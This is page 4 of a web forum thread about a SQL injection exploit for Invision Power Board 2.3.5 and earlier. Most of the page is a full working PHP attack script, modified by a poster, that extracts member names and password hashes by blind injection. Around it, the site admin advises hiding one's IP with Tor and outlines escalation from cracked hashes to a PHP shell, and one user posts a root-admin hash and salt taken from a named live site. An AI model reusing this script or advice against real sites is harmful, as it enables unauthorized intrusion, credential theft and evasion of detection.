Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
November 22, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 249
Members: 0
Total: 249
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> IPB <= 2.3.5 sql injection exploit (new version 1.2) Goto page Previous  1, 2, 3, 4, 5, 6  Next
Post new topic  Reply to topic View previous topic :: View next topic 
PostPosted: Thu Jan 22, 2009 5:34 pm Reply with quote
OpenMASK
Regular user
Regular user
 
Joined: Jan 22, 2009
Posts: 6




waraxe wrote:
It's probably vulnerable, because 2 test are passing, but for some reason sql error occurs in later phase. Why - i have no idea. You must debug the script (use echo, print or similar in right places) and try to find out server response. If needed, then there can be more ways to fetch data from the same sql injection. Just be creative Smile



Thank u very much man!! Smile)))
View user's profile Send private message
PostPosted: Thu Feb 26, 2009 3:45 am Reply with quote
AciddTripp
Beginner
Beginner
 
Joined: Feb 26, 2009
Posts: 1




Thanks for the exploit, works great.

One question, what is the risk of my ip address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself?
View user's profile Send private message
PostPosted: Thu Feb 26, 2009 2:16 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




AciddTripp wrote:
Thanks for the exploit, works great.

One question, what is the risk of my ip address being shown in any logs if I extract a large amount of hashes with this exploit? Or should I be running with an anonymous proxy to protect myself?


It's wise to hide your IP of course. From exploit source:

Code:

# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';


Just uncomment needed lines and use proxy. My suggestion is Tor:

http://vidalia-project.net

Tor is slow, but bulletproof for most operations Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri May 01, 2009 12:26 pm Reply with quote
VERTIGO
Advanced user
Advanced user
 
Joined: Sep 25, 2008
Posts: 87




Hmm waraxe one question/

i test one forum its ipb

www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527
and has isp eror,does will exploit works on these forum because in url does not have forums
View user's profile Send private message
PostPosted: Sun May 03, 2009 5:47 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




VERTIGO wrote:
Hmm waraxe one question/

i test one forum its ipb

www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527
and has isp eror,does will exploit works on these forum because in url does not have forums


As far as specifix AJAX function is accessible and sql injection really exists, this exploit should work.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon May 04, 2009 12:06 am Reply with quote
ba9ba9
Active user
Active user
 
Joined: Feb 11, 2009
Posts: 46




waraxe wrote:
VERTIGO wrote:
Hmm waraxe one question/

i test one forum its ipb

www.site.com\index.php?act=xmlout&do=check-display-name&name=%2527
and has isp eror,does will exploit works on these forum because in url does not have forums


As far as specifix AJAX function is accessible and sql injection really exists, this exploit should work.


its is any methode to get the prefix of a forum beacause ibf_ dont work
View user's profile Send private message
PostPosted: Mon Aug 17, 2009 5:17 pm Reply with quote
nuker
Active user
Active user
 
Joined: Aug 16, 2009
Posts: 39




hi,

can this exploit be modified so you can get the admin login logs? that would be useful as it shows the number of characters and last character of the password so its a little easier to figure it out.

thank you.
View user's profile Send private message
Modification
PostPosted: Sun Aug 23, 2009 3:55 pm Reply with quote
RG007145
Active user
Active user
 
Joined: May 04, 2008
Posts: 27




A quick modification (made in a big hurry) to fetch the login username given people's ID:

Note: It says finding hash but it's finding the username. And [a-f] means [A-z] since I'm so lazy.

Note 2: A "0" in the username means a space. One or multiple "0"s after the username means it's done.

Code:

<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.2
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 24. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. can work with multiple ID-s
// 6. log format compatible with passwordspro
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/ipb/';
$id_start = 1;// starting user ID, default value "1" is admin's ID
$id_end = 10;// ending user ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//======================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
//=====================================================================
///////////////////////////////////////////////////////////////////////
if(!extension_loaded('curl'))
{
   if(!dl('php_curl.dll'))
   {
      die("Curl extension not loaded!\n Fatal exit ...\n");
   }
   else
   {
      echo "Curl loading success\n";
   }
}
//=====================================================================
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
   if(!isset($_REQUEST['wtf-is-cli']))
   {
      echo "<html><head><title>Attention!</title></head>\n";
      echo "<body><br /><br /><center>\n";
      echo "<h1>Warning!</h1>\n";
      echo "This exploit is meant to be used as php CLI script!<br />\n";
      echo "More information:<br />\n";
      echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
      echo "Still, you can try to run it from webserver.<br />\n";
      echo "Just press the button below and prepare for long waiting<br />\n";
      echo "And learn to use php CLI next time, please ...<br />\n";
      echo "<form method=\"get\">\n";
      echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
      echo "</form>\n";
      echo "</center></body></html>\n";
      exit;
   }
   else
   {
      // Let's try to maximize our chances without CLI
      @set_time_limit(0);
   }
}
//=====================================================================
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
add_line("Target: $url");

for($i = $id_start; $i <= $id_end; $i ++)
{
   echo "Testing ID $i\n";
   if(!test_target_id($i))
   {
      echo "ID $i not valid, passing ...\n";
      continue;
   }
   echo "ID $i validated\n";
   
   $hash = get_hash($i);
   $salt = '';
   $line = "$i:$hash:$salt";
   add_line($line);

   xecho("\n------------------------------------------\n");
   xecho("User ID: $i\n");
   xecho("Hash: $hash\n");
   xecho("Salt: $salt");
   xecho("\n------------------------------------------\n");
}

add_line("------------------------------------------");

xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
   global $url;
   
   $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
   $buff = trim(make_post($url, $post, '', $url));

   if($buff === 'notfound')
   {
      die('Target is patched? Exiting ...');
   }
   
   if($buff !== 'found')
   {
      die('Invalid response, target URL not valid? Exiting ...');
   }
}
//////////////////////////////////////////////////////////////////////
function test_target_id($id)
{
   global $url, $prefix;
   
   $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';

   return test_condition($post);
}
///////////////////////////////////////////////////////////////////////
function get_hash($id)
{
   $len = 32;
   $out = '';
   
   xecho("Finding hash ...\n");
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_hashchar($i, $id);
      xecho("Got pos $i --> $ch\n");
      $out .= "$ch";
      xecho("Current hash: $out \n");
   }
   
   xecho("\nFinal hash for ID $id: $out\n\n");
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos, $id)
{
   global $prefix;

   $char = '';
  $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members WHERE id=$id AND ORD(SUBSTR(name,$pos,1))";

   // First let's determine, if it's number or letter
   $post = $pattern . '%253e57';
   $letter = test_condition($post);
   
   if($letter)
   {
      $min = 65;
      $max = 122;
      xecho("Char to find is [a-f]\n");
   }
   else
   {
      $min = 48;
      $max = 57;
      xecho("Char to find is [0-9]\n");
   }

   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $post = $pattern . "=$max";
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
     
      $half = intval(floor($area / 2));
      $curr = $min + $half;
     
      $post = $pattern . '%253e' . $curr;
     
      $bigger = test_condition($post);
     
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      xecho("Current test: $curr-$max-$min\n");
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
   global $url;
   
   $bret = false;
   $maxtry = 10;
   $try = 1;
     
   $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
   $post = sprintf($pattern, $p);
   
   while(1)
   {
      $buff = trim(make_post($url, $post, '', $url));

      if($buff === 'found')
      {
         $bret = true;
         break;
      }
      elseif($buff === 'notfound')
      {
         break;
      }
      elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
      {
         die("Sql error! Wrong prefix?\nExiting ... ");
      }
      else
      {
         xecho("test_condition() - try $try - invalid return value ...\n");
         $try ++;
         if($try > $maxtry)
         {
            die("Too many tries - exiting ...\n");
         }
         else
         {
            xecho("Trying again - try $try ...\n");
         }
      }
   }
   
   return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt ($ch, CURLOPT_URL, $url);
   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
   
   if(!empty($GLOBALS['proxy_ip_port']))
   {
      curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
     
      if(!empty($GLOBALS['proxy_user_password']))
      {
         curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
      }
   }
   
   if(!empty($cookie))
   {
      curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt ($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt ($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt ($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
   global $outfile;
   
   $line .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $line);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
   if($GLOBALS['cli'])
   {
      echo "$line";
   }
   else
   {
      $line = nl2br(htmlspecialchars($line));
      echo "$line";
   }
}
//////////////////////////////////////////////////////////////////////
?>
View user's profile Send private message
PostPosted: Mon Aug 24, 2009 3:21 am Reply with quote
nuker
Active user
Active user
 
Joined: Aug 16, 2009
Posts: 39




Nice, can you modify it so you can get the admin login logs with it?
View user's profile Send private message
PostPosted: Thu Oct 22, 2009 7:35 am Reply with quote
Meithal
Beginner
Beginner
 
Joined: Oct 22, 2009
Posts: 3




tere!

Is there any mean to use this exploit for UPDATE a table? It's a question of LIFE or DEATH. Thank you!
View user's profile Send private message
PostPosted: Thu Oct 22, 2009 9:59 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Meithal wrote:
tere!

Is there any mean to use this exploit for UPDATE a table? It's a question of LIFE or DEATH. Thank you!


Tere Smile

In case of php/mysql combination there is no stacked (multiple) sql queries allowed. So you need sql injection vulnerability in UPDATE query in order to manipulate specific table in writable manner.
My IPB exploit is based on sql injection in SELECT query, so it is not able to UPDATE directly. But if you can fetch admin hash(-es) and they are crackable, then IPB admin level and finally PHP code level are possible (php shell). Which means, that you can modify sql database from php.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Oct 22, 2009 10:40 am Reply with quote
Meithal
Beginner
Beginner
 
Joined: Oct 22, 2009
Posts: 3




ok thanks, of course the sql shell don't allow to update the tables you need, but there is still the template bits where there is many php code, let's go here Wink
View user's profile Send private message
not work
PostPosted: Wed Nov 04, 2009 12:21 pm Reply with quote
Doky
Beginner
Beginner
 
Joined: Nov 04, 2009
Posts: 1




Hy,not working...
Script generate hash & salt.. not work:(

------------------------------------------
User ID: 142348 (Root admin)
Hash: 00d2594a7a719d383ad178778951461b
Salt: UVe3'
------------------------------------------

www.netmozi.com

not work,not login.. :S
test pls Very Happy thx
View user's profile Send private message
PostPosted: Sat Nov 07, 2009 11:33 pm Reply with quote
RG007145
Active user
Active user
 
Joined: May 04, 2008
Posts: 27




You're not allowed to post websites...
View user's profile Send private message
PostPosted: Thu Dec 10, 2009 1:09 am Reply with quote
AgentJ9
Active user
Active user
 
Joined: Sep 07, 2008
Posts: 26




does it still work? & what version of PHP will i need?
View user's profile Send private message Send e-mail
IPB <= 2.3.5 sql injection exploit (new version 1.2)
  www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 4 of 6  
Goto page Previous  1, 2, 3, 4, 5, 6  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.074 Seconds